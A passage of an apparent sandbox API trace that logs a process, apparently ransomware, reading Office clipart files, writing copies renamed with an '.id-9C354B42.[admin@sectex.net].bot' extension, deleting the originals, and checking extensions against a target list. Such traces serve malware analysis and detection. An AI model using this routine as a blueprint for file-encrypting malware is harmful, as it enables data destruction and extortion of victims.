	[0171.054] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182689.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182689.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0171.055] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.055] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.055] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182689.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182689.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0171.056] GetLastError () returned 0x0
	[0171.056] ReadFile (in: hFile=0x388, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x40e7, lpOverlapped=0x0) returned 1
	[0171.275] WriteFile (in: hFile=0x3c4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x40f0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x40f0, lpOverlapped=0x0) returned 1
	[0171.279] ReadFile (in: hFile=0x388, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.279] WriteFile (in: hFile=0x3c4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0171.279] SetEndOfFile (hFile=0x3c4) returned 1
	[0171.282] CloseHandle (hObject=0x3c4) returned 1
	[0171.282] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.282] SetEndOfFile (hFile=0x388) returned 1
	[0171.284] CloseHandle (hObject=0x388) returned 1
	[0171.284] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182689.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0171.334] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182689.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182689.jpg")) returned 1
	[0171.335] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182689.JPG") returned 63
	[0171.335] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182689.JPG") returned 63
	[0171.335] lstrlenW (lpString=".doc") returned 4
	[0171.336] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0171.336] lstrlenW (lpString=".docx") returned 5
	[0171.336] lstrcmpiW (lpString1=".docx", lpString2="9.JPG") returned -1
	[0171.336] lstrlenW (lpString=".pdf") returned 4
	[0171.336] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0171.336] lstrlenW (lpString=".xls") returned 4
	[0171.336] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0171.336] lstrlenW (lpString=".xlsx") returned 5
	[0171.336] lstrcmpiW (lpString1=".xlsx", lpString2="9.JPG") returned -1
	[0171.336] lstrlenW (lpString=".ppt") returned 4
	[0171.336] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0171.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182689.JPG") returned 63
	[0171.336] lstrlenW (lpString=".zip") returned 4
	[0171.336] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0171.336] lstrlenW (lpString=".rar") returned 4
	[0171.336] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0171.336] lstrlenW (lpString=".bz2") returned 4
	[0171.336] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0171.336] lstrlenW (lpString=".7z") returned 3
	[0171.336] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0171.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182689.JPG") returned 63
	[0171.336] lstrlenW (lpString=".dbf") returned 4
	[0171.336] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0171.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182689.JPG") returned 63
	[0171.336] lstrlenW (lpString=".1cd") returned 4
	[0171.336] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0171.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182689.JPG") returned 63
	[0171.336] lstrlenW (lpString=".jpg") returned 4
	[0171.336] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0171.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182689.JPG") returned 63
	[0171.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182689.JPG") returned 63
	[0171.336] lstrlenW (lpString=".doc") returned 4
	[0171.337] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0171.337] lstrlenW (lpString=".docx") returned 5
	[0171.337] lstrcmpiW (lpString1=".docx", lpString2="9.JPG") returned -1
	[0171.337] lstrlenW (lpString=".pdf") returned 4
	[0171.337] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0171.337] lstrlenW (lpString=".xls") returned 4
	[0171.337] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0171.337] lstrlenW (lpString=".xlsx") returned 5
	[0171.337] lstrcmpiW (lpString1=".xlsx", lpString2="9.JPG") returned -1
	[0171.337] lstrlenW (lpString=".ppt") returned 4
	[0171.337] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0171.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182689.JPG") returned 63
	[0171.337] lstrlenW (lpString=".zip") returned 4
	[0171.337] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0171.337] lstrlenW (lpString=".rar") returned 4
	[0171.337] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0171.337] lstrlenW (lpString=".bz2") returned 4
	[0171.337] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0171.337] lstrlenW (lpString=".7z") returned 3
	[0171.337] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0171.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182689.JPG") returned 63
	[0171.337] lstrlenW (lpString=".dbf") returned 4
	[0171.337] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0171.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182689.JPG") returned 63
	[0171.337] lstrlenW (lpString=".1cd") returned 4
	[0171.337] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0171.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182689.JPG") returned 63
	[0171.337] lstrlenW (lpString=".jpg") returned 4
	[0171.337] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0171.338] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0171.338] lstrlenW (lpString="J0185778.WMF") returned 12
	[0171.338] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185778.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185778.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0171.347] GetFileSizeEx (in: hFile=0x188, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=25312) returned 1
	[0171.360] CloseHandle (hObject=0x188) returned 1
	[0171.360] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185778.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185778.wmf")) returned 0x20
	[0171.360] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185778.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185778.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0171.360] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185778.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185778.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350
	[0171.366] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.366] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.366] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185778.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185778.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124
	[0171.367] GetLastError () returned 0x0
	[0171.367] ReadFile (in: hFile=0x350, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x62e0, lpOverlapped=0x0) returned 1
	[0171.369] WriteFile (in: hFile=0x124, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x62f0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x62f0, lpOverlapped=0x0) returned 1
	[0171.370] ReadFile (in: hFile=0x350, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.370] WriteFile (in: hFile=0x124, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0171.371] SetEndOfFile (hFile=0x124) returned 1
	[0171.371] CloseHandle (hObject=0x124) returned 1
	[0171.371] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.371] SetEndOfFile (hFile=0x350) returned 1
	[0171.373] CloseHandle (hObject=0x350) returned 1
	[0171.373] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185778.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0171.373] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185778.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185778.wmf")) returned 1
	[0171.374] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185778.WMF") returned 63
	[0171.374] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185778.WMF") returned 63
	[0171.374] lstrlenW (lpString=".doc") returned 4
	[0171.374] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.374] lstrlenW (lpString=".docx") returned 5
	[0171.374] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0171.374] lstrlenW (lpString=".pdf") returned 4
	[0171.374] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.374] lstrlenW (lpString=".xls") returned 4
	[0171.374] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.374] lstrlenW (lpString=".xlsx") returned 5
	[0171.374] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0171.374] lstrlenW (lpString=".ppt") returned 4
	[0171.374] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.374] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185778.WMF") returned 63
	[0171.375] lstrlenW (lpString=".zip") returned 4
	[0171.375] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.375] lstrlenW (lpString=".rar") returned 4
	[0171.375] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.375] lstrlenW (lpString=".bz2") returned 4
	[0171.375] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.375] lstrlenW (lpString=".7z") returned 3
	[0171.375] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.375] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185778.WMF") returned 63
	[0171.375] lstrlenW (lpString=".dbf") returned 4
	[0171.375] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.375] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185778.WMF") returned 63
	[0171.375] lstrlenW (lpString=".1cd") returned 4
	[0171.375] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.375] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185778.WMF") returned 63
	[0171.375] lstrlenW (lpString=".jpg") returned 4
	[0171.375] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.375] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185778.WMF") returned 63
	[0171.375] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185778.WMF") returned 63
	[0171.375] lstrlenW (lpString=".doc") returned 4
	[0171.375] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.375] lstrlenW (lpString=".docx") returned 5
	[0171.375] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0171.375] lstrlenW (lpString=".pdf") returned 4
	[0171.375] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.375] lstrlenW (lpString=".xls") returned 4
	[0171.375] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.375] lstrlenW (lpString=".xlsx") returned 5
	[0171.375] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0171.375] lstrlenW (lpString=".ppt") returned 4
	[0171.375] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185778.WMF") returned 63
	[0171.376] lstrlenW (lpString=".zip") returned 4
	[0171.376] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.376] lstrlenW (lpString=".rar") returned 4
	[0171.376] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.376] lstrlenW (lpString=".bz2") returned 4
	[0171.376] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.376] lstrlenW (lpString=".7z") returned 3
	[0171.376] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185778.WMF") returned 63
	[0171.376] lstrlenW (lpString=".dbf") returned 4
	[0171.376] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185778.WMF") returned 63
	[0171.376] lstrlenW (lpString=".1cd") returned 4
	[0171.376] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185778.WMF") returned 63
	[0171.376] lstrlenW (lpString=".jpg") returned 4
	[0171.376] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.376] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0171.376] lstrlenW (lpString="J0185790.WMF") returned 12
	[0171.376] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185790.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185790.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350
	[0171.377] GetFileSizeEx (in: hFile=0x350, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=20662) returned 1
	[0171.377] CloseHandle (hObject=0x350) returned 1
	[0171.377] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185790.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185790.wmf")) returned 0x20
	[0171.377] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185790.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185790.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0171.377] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185790.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185790.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350
	[0171.377] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.377] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.377] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185790.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185790.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124
	[0171.378] GetLastError () returned 0x0
	[0171.378] ReadFile (in: hFile=0x350, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x50b6, lpOverlapped=0x0) returned 1
	[0171.380] WriteFile (in: hFile=0x124, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x50c0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x50c0, lpOverlapped=0x0) returned 1
	[0171.381] ReadFile (in: hFile=0x350, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.381] WriteFile (in: hFile=0x124, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0171.381] SetEndOfFile (hFile=0x124) returned 1
	[0171.382] CloseHandle (hObject=0x124) returned 1
	[0171.382] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.382] SetEndOfFile (hFile=0x350) returned 1
	[0171.384] CloseHandle (hObject=0x350) returned 1
	[0171.384] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185790.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0171.384] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185790.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185790.wmf")) returned 1
	[0171.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185790.WMF") returned 63
	[0171.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185790.WMF") returned 63
	[0171.385] lstrlenW (lpString=".doc") returned 4
	[0171.385] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.385] lstrlenW (lpString=".docx") returned 5
	[0171.385] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0171.385] lstrlenW (lpString=".pdf") returned 4
	[0171.385] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.385] lstrlenW (lpString=".xls") returned 4
	[0171.385] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.385] lstrlenW (lpString=".xlsx") returned 5
	[0171.385] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0171.385] lstrlenW (lpString=".ppt") returned 4
	[0171.385] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185790.WMF") returned 63
	[0171.385] lstrlenW (lpString=".zip") returned 4
	[0171.385] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.385] lstrlenW (lpString=".rar") returned 4
	[0171.385] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.385] lstrlenW (lpString=".bz2") returned 4
	[0171.385] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.385] lstrlenW (lpString=".7z") returned 3
	[0171.385] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185790.WMF") returned 63
	[0171.386] lstrlenW (lpString=".dbf") returned 4
	[0171.386] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185790.WMF") returned 63
	[0171.386] lstrlenW (lpString=".1cd") returned 4
	[0171.386] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185790.WMF") returned 63
	[0171.386] lstrlenW (lpString=".jpg") returned 4
	[0171.386] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185790.WMF") returned 63
	[0171.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185790.WMF") returned 63
	[0171.386] lstrlenW (lpString=".doc") returned 4
	[0171.386] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.386] lstrlenW (lpString=".docx") returned 5
	[0171.386] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0171.386] lstrlenW (lpString=".pdf") returned 4
	[0171.386] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.386] lstrlenW (lpString=".xls") returned 4
	[0171.386] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.386] lstrlenW (lpString=".xlsx") returned 5
	[0171.386] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0171.386] lstrlenW (lpString=".ppt") returned 4
	[0171.386] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185790.WMF") returned 63
	[0171.386] lstrlenW (lpString=".zip") returned 4
	[0171.386] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.386] lstrlenW (lpString=".rar") returned 4
	[0171.386] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.386] lstrlenW (lpString=".bz2") returned 4
	[0171.386] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.386] lstrlenW (lpString=".7z") returned 3
	[0171.387] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185790.WMF") returned 63
	[0171.387] lstrlenW (lpString=".dbf") returned 4
	[0171.387] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185790.WMF") returned 63
	[0171.387] lstrlenW (lpString=".1cd") returned 4
	[0171.387] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185790.WMF") returned 63
	[0171.387] lstrlenW (lpString=".jpg") returned 4
	[0171.387] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.387] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0171.387] lstrlenW (lpString="J0185796.WMF") returned 12
	[0171.387] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185796.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185796.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350
	[0171.388] GetFileSizeEx (in: hFile=0x350, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=25868) returned 1
	[0171.388] CloseHandle (hObject=0x350) returned 1
	[0171.388] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185796.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185796.wmf")) returned 0x20
	[0171.388] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185796.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185796.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0171.388] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185796.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185796.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350
	[0171.388] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
